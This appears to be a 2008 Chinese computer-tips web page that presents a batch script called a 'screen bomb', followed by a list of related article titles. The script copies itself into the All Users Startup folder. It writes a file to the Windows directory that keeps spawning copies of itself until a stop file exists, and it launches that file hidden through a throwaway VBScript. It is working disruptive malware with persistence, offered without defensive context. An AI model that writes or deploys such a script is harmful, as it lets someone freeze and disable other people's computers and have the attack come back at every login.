您的位置:小奇电脑 电脑技巧 正文
 添加时间:2008-06-16 原文发表:2008-06-16 人气:17


屏幕炸弹BAT
@echo off
if not exist "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat" copy %~fs0 "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat">nul
echo @echo off>%windir%\power.bat
echo if "%%1"=="" goto :end>>%windir%\power.bat
echo if exist C:\_stop goto :EOF>>%windir%\power.bat
echo start /B %%~fs0 exp>>%windir%\power.bat
echo :s>>%windir%\power.bat
echo if not exist C:\_stop goto s>>%windir%\power.bat
echo exit>>%windir%\power.bat
echo :end>>%windir%\power.bat
echo del %%~fs0>>%windir%\power.bat
echo set ws=CreateObject("WScript.Shell")>%windir%\power.vbs
echo ws.Run "%windir%\power.bat exp",0 >>%windir%\power.vbs
WScript %windir%\power.vbs
del %windir%\power.vbs
set p=%~ps0
if not %p:~-3,2%==启动 del %~fs0
本页地址
相关文章

隐藏在互联网上的摄像头
共享摄像头,搭建网上会议室
实用12招抓图秘笈
通过.inf文件让Windows XP进行自动维护的技
限制移动硬盘使用的措施
智能ABC中“字母键”与“字符键”的妙用
实现Windows Vista启动时自动登录的简单方法
Windows共享文件夹找你如此容易
“本地连接”相关故障现象及其排除方法
解决Windows系统桌面常遇故障的方法
在Dos下维护注册表
建立个隐藏帐户
WinXP注册表还原简单一法
全面优化电脑系统
市面常见加密光盘破解不完全招数大揭秘
神不知鬼不觉 巧妙更换Win XP用户密码
XP系统节省内存小技巧
MP3 防病毒威胁四小招
利用注册表删除疑难杂症
没有系统盘要怎么装系统

相关评论


本文章所属分类:首页 电脑技巧